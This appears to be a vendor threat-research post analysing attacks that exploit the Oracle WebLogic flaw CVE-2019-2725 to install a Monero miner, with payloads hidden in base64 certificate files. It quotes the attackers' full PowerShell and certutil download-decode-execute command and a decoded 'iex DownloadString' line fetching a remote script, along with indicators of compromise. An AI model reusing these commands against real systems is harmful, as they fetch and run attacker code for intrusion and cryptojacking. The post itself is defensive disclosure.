CVE-2019-2725 Exploited and Certificate Files Used for Obfuscation to Deliver Monero Miner

by Mark Vicente, Johnlery Triunfante, and Byron Gelera

In April 2019, a security advisory was released for CVE-2019-2725, a deserialization vulnerability involving the widely used Oracle WebLogic Server. Soon after the advisory was published, reports emerged on the SANS ISC InfoSec forums that the vulnerability was already being actively exploited to install cryptocurrency miners. We managed to confirm these reports after feedback from the Trend Micro™ Smart Protection Network™ security architecture revealed a similar cryptocurrency-mining activity involving the vulnerability, but with an interesting twist — the malware hides its malicious codes in certificate files as an obfuscation tactic.

Infection chain

 Figure 1. The infection chain

Figure 1. The infection chain

Installation routine

After arriving on the target machine, the malware will exploit CVE-2019-2725 to execute the following command:

“powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString(‘hxxp://45.32.28.187:1012/cert.cer’); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer”

The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).

It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file. The decoded file is then saved as %APPDATA%update.ps1.

The newly created update.ps1 (Trojan.PS1.MALXMR.MPA) file is then executed using PS before the downloaded cert.cer file is deleted using cmd.

When we downloaded the certificate file, we noticed that it looked like a normal Privacy-Enhanced Mail (PEM) format certificate.

 Figure 2. The downloaded certificate file

Figure 2. The downloaded certificate file

However, upon decoding the base64 content, we found that, instead of the commonly used X.509 TLS file format, it actually comes in the form of the following PS command:

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once. There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.

The cryptocurrency miner payload

The PS command from the certificate file downloads and executes another PS script in memory. This script will then download and execute the following files:

File Details
Sysupdate.exe Monero (XMR) miner payload
Config.json The config file for the XMR miner
Networkservice.exe Possibly used for the propagation and exploitation of WebLogic
Update.ps1 The PS script in memory
Sysguard .exe Serves as the watchdog for the miner process
Clean.bat Deletes other components

The update.ps1 file containing the decoded certificate file is then replaced with the new update.ps1. This is followed by the creation of a scheduled task that will execute the new update.ps1 every 30 minutes.

Certificate files as an obfuscation technique

The idea of using certificate files to hide malware is not a new one: a proof of concept was introduced late last year by Sophos in which they demonstrated placing an Excel file with an embedded macro inside a certificate file. If any actual incidents have been found, they are probably few. By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal -— especially when establishing HTTPS connections.

However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier. This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.

Oracle has already released an update that addresses CVE-2019-2725. Thus, it is highly recommended for organizations that use WebLogic Server to update their software to the latest version to prevent any attacks that exploit the vulnerability from affecting their businesses.

Trend Micro solutions

Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and blocking all related malicious URLs. Enterprises can also monitor all ports and network protocols for advanced threats and be protected from targeted attacks with the Trend Micro Deep Discovery™ Inspector network appliance.

Deep Discovery Inspector protects customers from these threats via this DDI Rule:

  • DDI Beta Rule 3783: Possible Oracle Weblogic Remote Command Execution Exploit – HTTP (Request) – Beta

Furthermore, Trend Micro Deep Security and Vulnerability Protection protect user systems from threats via the following DPI rule:

  • 1009707-Oracle Weblogic Server Remote Code Execution Vulnerability (CVE-2019-2725)

Trend Micro™ TippingPoint® customers are protected from threats and attacks that may exploit this vulnerability via the following MainlineDV filter:

  • HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability

Indicators of Compromise (IoCs)

Details Hashes (SHA-256) Detection  Name
sysguard.exe-upx e4bc026aec8a76b887a8fc48726b9c48540fc2aa76eb8e61893da2ee6df6ab3a TROJ_GEN.R002C0GDM19
sysupdate.exe 4b9842b6be35665174c78c3e4063c645bd6e10eb333f68e4c7840fe823647bdf Coinminer.Linux.MALXMR.UWEJI
update.ps1 c30f42e6f638f3e8218caf73c2190d2a521304431994fd6efeef523cfbaa5e81 Trojan.PS1.MALXMR.MPA
cert.cer 3a567b7985b2da76db5e5a1d5554f7c13f375d88a27d6e6d108ad79e797adc9a Coinminer.Win32.MALXMR.TIAOODCJ.component

URLs

  • hxxp://139[.]180[.]199[.]167:1012/clean[.]bat
  • hxxp://139[.]180[.]199[.]167:1012/config[.]json
  • hxxp://139[.]180[.]199[.]167:1012/networkservice[.]exe
  • hxxp://139[.]180[.]199[.]167:1012/sysguard[.]exe
  • hxxp://139[.]180[.]199[.]167:1012/sysupdate[.]exe
  • hxxp://139[.]180[.]199[.]167:1012/update[.]ps1
  • hxxp://45.32.28.187:1012
  • hxxp://45.32.28.187:1012/cert.cer
  • hxxps://pixeldrain[.]com/api/file/bg2Fh-d_
  • hxxps://pixeldrain[.]com/api/file/cGsOoTyb
  • hxxps://pixeldrain[.]com/api/file/cGsOoTyb/wujnEh-n1
  • hxxps://pixeldrain[.]com/api/file/DF1zsieq1
  • hxxps://pixeldrain[.]com/api/file/TyodGuTm

The post CVE-2019-2725 Exploited and Certificate Files Used for Obfuscation to Deliver Monero Miner appeared first on .

This post appeared first on Trend Macro Blog
Author: Trend Micro